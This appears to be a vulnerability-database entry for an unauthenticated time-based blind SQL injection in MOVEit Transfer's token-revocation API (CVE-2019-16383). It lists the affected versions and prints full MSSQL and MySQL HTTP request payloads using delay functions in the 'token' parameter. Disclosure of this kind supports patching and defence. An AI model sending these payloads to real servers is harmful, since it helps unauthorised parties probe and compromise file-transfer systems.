vendor:
MOVEit Transfer
by:
Aviv Beniash, Noam Moshe
9.4
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: MOVEit Transfer
Affected Version From: MOVEit Transfer 2018 SP2 before 10.2.4
Affected Version To: 2019.1 before 11.1.1
Patch Exists: YES
Related CWE: CVE-2019-16383
CPE: 2.3:a:ipswitch:moveit_transfer:2018:sp2:*:*:*:*:*:*:*
Metasploit:
N/A
Other Scripts:
N/A
Platforms Tested: None
2020
MOVEit Transfer 11.1.1 – ‘token’ Unauthenticated SQL Injection
The API call for revoking logon tokens is vulnerable to a Time based blind SQL injection via the 'token' parameter. MSSQL payload: POST /api/v1/token/revoke HTTP/1.1 Host: moveittransferstg Content-Type: application/x-www-form-urlencoded Content-Length: 32 token='; WAITFOR DELAY '0:0:10'-- MySQL payload: POST /api/v1/token/revoke HTTP/1.1 Host: moveittransferstg Content-Type: application/x-www-form-urlencoded Content-Length: 21 token=' OR SLEEP(10);--
Mitigation:
The vendor has released a patch to address this vulnerability.